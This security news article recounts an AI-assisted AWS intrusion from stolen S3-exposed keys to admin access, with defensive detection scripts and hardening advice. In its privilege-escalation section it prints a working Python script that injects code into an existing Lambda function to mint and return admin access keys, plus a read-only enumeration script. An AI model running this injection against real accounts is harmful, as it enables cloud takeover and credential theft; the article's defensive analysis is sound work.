Threat actors are using artificial intelligence (AI) to accelerate cloud intrusions.
In a recent incident observed by Sysdig researchers, attackers escalated from stolen credentials to full administrative access in an AWS environment in under 10 minutes, illustrating how AI can shorten cloud attack timelines.
“The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources,” said the researchers.
Inside the AI-Assisted AWS Intrusion
According to Sysdig’s analysis of the November 2025 incident, the attack began with the discovery of valid AWS credentials exposed in publicly accessible Amazon S3 buckets.
These buckets were used to store Retrieval-Augmented Generation (RAG) data for AI models and contained long-lived access keys that could be abused by anyone who found them.
The exposed credentials belonged to an IAM user with the ReadOnlyAccess policy attached, along with limited permissions for Amazon Bedrock.
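The initial exposure is also the easiest stage to catch. As a starting point, defenders can sweep the buckets that feed their AI pipelines for key material. The minimal Python sketch below scans a bucket's text objects for the AKIA prefix that long-lived IAM access keys carry; the bucket name is a placeholder, not from the incident.

```python
import re
import boto3

# Pattern for long-lived IAM user access key IDs (AKIA + 16 characters).
ACCESS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

s3 = boto3.client("s3")

def scan_bucket_for_keys(bucket):
    """Flag text objects in `bucket` that contain access key IDs."""
    findings = []
    for page in s3.get_paginator("list_objects_v2").paginate(Bucket=bucket):
        for obj in page.get("Contents", []):
            body = s3.get_object(Bucket=bucket, Key=obj["Key"])["Body"].read()
            try:
                text = body.decode("utf-8")
            except UnicodeDecodeError:
                continue  # skip binary artifacts such as model files
            for key_id in ACCESS_KEY_RE.findall(text):
                findings.append((obj["Key"], key_id))
    return findings

# "example-rag-bucket" is a placeholder bucket name.
for key, key_id in scan_bucket_for_keys("example-rag-bucket"):
    print(f"Possible exposed access key {key_id} in s3://example-rag-bucket/{key}")
```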
Reconnaissance Across AWS and AI Services
Although these privileges did not allow direct administrative actions, they provided broad visibility across the environment.
Using this access, the threat actor conducted extensive reconnaissance across multiple AWS services, including Secrets Manager, Lambda, EC2, ECS, RDS, CloudWatch, and Key Management Service (KMS).
They also enumerated Bedrock models and related AI services early in the intrusion, indicating an initial interest in identifying AI-related resources for potential abuse.
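None of this enumeration requires special tooling. The sketch below illustrates the kind of ordinary read-only boto3 calls that a ReadOnlyAccess key permits across the services named above; pointed at your own account, it previews what a stolen key of this type would reveal.

```python
import boto3

session = boto3.Session()

# Each of these is a plain read-only API call allowed by ReadOnlyAccess.
secrets = session.client("secretsmanager").list_secrets()
functions = session.client("lambda").list_functions()
instances = session.client("ec2").describe_instances()
models = session.client("bedrock").list_foundation_models()

print(len(secrets["SecretList"]), "secrets visible")
print(len(functions["Functions"]), "Lambda functions visible")
print(sum(len(r["Instances"]) for r in instances["Reservations"]),
      "EC2 instances visible")
print(len(models["modelSummaries"]), "Bedrock foundation models visible")
```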
Privilege Escalation Through Lambda Code Injection
After mapping the environment, the attacker attempted to escalate privileges by assuming IAM roles commonly associated with administrative access.
When those attempts failed, they pivoted to a more reliable escalation technique: Lambda function code injection.
Because the compromised IAM user had UpdateFunctionCode and UpdateFunctionConfiguration permissions, the attacker was able to modify the code of an existing Lambda function that ran under an overly permissive execution role.
The attacker iterated on this approach several times, ultimately succeeding in creating new access keys for an administrative IAM user.
This step effectively granted full control over the AWS environment without the need for external command-and-control (C2) infrastructure, as the malicious Lambda function returned the newly created credentials directly in its execution output.
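The mechanics are straightforward enough to reconstruct. The sketch below is a hypothetical illustration of the technique, not the actor's actual code; the function name "target-fn" and the IAM user "admin-user" are placeholders.

```python
import io
import json
import zipfile
import boto3

# Hypothetical payload that runs under the Lambda's overly permissive
# execution role; "admin-user" is a placeholder administrative IAM user.
PAYLOAD = """
import boto3

def handler(event, context):
    key = boto3.client("iam").create_access_key(UserName="admin-user")["AccessKey"]
    # Returning the key in the response means no C2 channel is needed.
    return {"AccessKeyId": key["AccessKeyId"],
            "SecretAccessKey": key["SecretAccessKey"]}
"""

lam = boto3.client("lambda")

# Package the payload as the zip archive Lambda deployments expect.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("index.py", PAYLOAD)

lam.update_function_code(FunctionName="target-fn", ZipFile=buf.getvalue())
lam.get_waiter("function_updated_v2").wait(FunctionName="target-fn")
lam.update_function_configuration(FunctionName="target-fn", Handler="index.handler")
lam.get_waiter("function_updated_v2").wait(FunctionName="target-fn")

resp = lam.invoke(FunctionName="target-fn")
print(json.loads(resp["Payload"].read()))  # fresh admin credentials, in-band
```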
Sysdig's analysis of the actual injected Lambda code revealed several indicators of AI-assisted development.
The script included detailed exception handling, execution timeout adjustments, and comments written in Serbian.
Researchers also observed behavior consistent with large language model (LLM) hallucinations, such as attempts to assume roles in non-existent AWS account IDs and references to a GitHub repository that does not exist.
Lateral Movement and Persistence
With administrative access secured, the threat actor expanded their foothold by moving laterally across the environment.
They operated across 19 distinct AWS principals, including multiple IAM roles and users, created new access keys, and established a persistent backdoor user with the AdministratorAccess policy attached.
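Those same IAM write events are a natural hunting target. One possible approach, sketched below with an assumed seven-day lookback, is to query CloudTrail for the calls the actor chained together: CreateUser, CreateAccessKey, and AttachUserPolicy.

```python
from datetime import datetime, timedelta, timezone
import boto3

ct = boto3.client("cloudtrail")
start = datetime.now(timezone.utc) - timedelta(days=7)  # lookback is an assumption

# IAM write events associated with the persistence pattern described above.
for event_name in ("CreateUser", "CreateAccessKey", "AttachUserPolicy"):
    pages = ct.get_paginator("lookup_events").paginate(
        LookupAttributes=[{"AttributeKey": "EventName",
                           "AttributeValue": event_name}],
        StartTime=start,
    )
    for page in pages:
        for event in page["Events"]:
            print(event["EventTime"], event_name, "by",
                  event.get("Username", "unknown"))
```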
LLMjacking and GPU Resource Abuse
The attacker then shifted focus to LLMjacking, abusing the victim’s Amazon Bedrock access to invoke multiple foundation models, including Claude, DeepSeek, Llama, and Amazon Titan.
Because model invocation logging was disabled, this activity likely went undetected while generating real usage costs for the organization.
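Turning that logging on is a single API call. The sketch below shows one way to enable it via boto3; the log group name and delivery role ARN are placeholders that must already exist in your account.

```python
import boto3

bedrock = boto3.client("bedrock")

# Placeholder log group and role ARN; substitute resources from your account.
bedrock.put_model_invocation_logging_configuration(
    loggingConfig={
        "cloudWatchConfig": {
            "logGroupName": "/bedrock/invocations",
            "roleArn": "arn:aws:iam::123456789012:role/BedrockLoggingRole",
        },
        "textDataDeliveryEnabled": True,
        "imageDataDeliveryEnabled": True,
        "embeddingDataDeliveryEnabled": True,
    }
)
```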
In the final stage of the attack, the threat actor provisioned high-end GPU infrastructure for machine learning workloads.
They successfully launched a p4d.24xlarge EC2 instance, which costs approximately $32.77 per hour, and used user data scripts to install CUDA, PyTorch, and other ML frameworks.
The scripts also launched a publicly accessible JupyterLab server, creating a backdoor that would allow continued access to the instance even if AWS credentials were later revoked.
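A simple guardrail in the same spirit is to watch for expensive GPU families appearing at all. The sketch below flags any pending or running GPU instances; the family list is an assumption, and in practice you would route matches to an alert rather than print them.

```python
import boto3

# Assumed list of GPU instance families worth flagging.
GPU_FAMILIES = ("p3", "p4d", "p4de", "p5", "g5", "g6")

ec2 = boto3.client("ec2")
pages = ec2.get_paginator("describe_instances").paginate(
    Filters=[{"Name": "instance-state-name", "Values": ["pending", "running"]}]
)
for page in pages:
    for reservation in page["Reservations"]:
        for inst in reservation["Instances"]:
            if inst["InstanceType"].split(".")[0] in GPU_FAMILIES:
                print("GPU instance running:",
                      inst["InstanceId"], inst["InstanceType"])
```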
Reducing Cloud Risk in the Age of AI
As AI-assisted cloud attacks become faster and more automated, organizations need defensive controls that go beyond basic misconfiguration fixes.
The following measures focus on reducing privilege exposure, limiting attacker movement, and improving visibility into high-risk cloud and AI activity.
- Enforce strict least-privilege access across IAM users, roles, and Lambda execution roles, and eliminate long-lived access keys in favor of short-lived, role-based credentials (see the audit sketch after this list).
- Restrict Lambda modification and role-passing capabilities by tightly controlling UpdateFunctionCode, UpdateFunctionConfiguration, and PassRole permissions and limiting deployments to approved CI/CD pipelines.
- Secure AI and cloud data stores by ensuring S3 buckets containing credentials, RAG data, or model artifacts are never public and are continuously monitored for exposure.
- Improve detection of AI-assisted attacks by monitoring for high-velocity enumeration, identity switching, role chaining, and anomalous API activity across cloud services.
- Lock down AI and compute resource usage by enabling Amazon Bedrock model invocation logging, restricting which models can be invoked, and applying quotas and alerts to GPU instance families.
- Reduce blast radius through strong account segmentation, hardened cross-account trust policies, and continuous review of IAM Access Analyzer findings.
- Prepare for rapid containment by retaining immutable audit logs and regularly testing cloud-specific incident response plans, including scenarios involving serverless compromise and AI service abuse.
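As a concrete starting point for the first recommendation, the short audit below lists every IAM user's access keys and flags active keys older than a cutoff; the 90-day threshold is an assumption to adjust to your own policy.

```python
from datetime import datetime, timedelta, timezone
import boto3

iam = boto3.client("iam")
cutoff = datetime.now(timezone.utc) - timedelta(days=90)  # assumed threshold

for page in iam.get_paginator("list_users").paginate():
    for user in page["Users"]:
        keys = iam.list_access_keys(UserName=user["UserName"])["AccessKeyMetadata"]
        for key in keys:
            if key["Status"] == "Active" and key["CreateDate"] < cutoff:
                print(f"{user['UserName']}: key {key['AccessKeyId']} "
                      f"active since {key['CreateDate']:%Y-%m-%d}")
```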
Together, these steps can help shorten detection timelines and limit the blast radius.
AI Is Accelerating Cloud Attacks
This incident demonstrates how cloud intrusions can escalate rapidly when exposed credentials, permissive identities, and automated tooling are combined.
The increasing adoption of large language models in attack workflows is expected to further reduce the time available for detection and response.
As attacks accelerate and implicit trust breaks down, organizations are increasingly turning to zero-trust to limit access and reduce the impact of compromised identities.
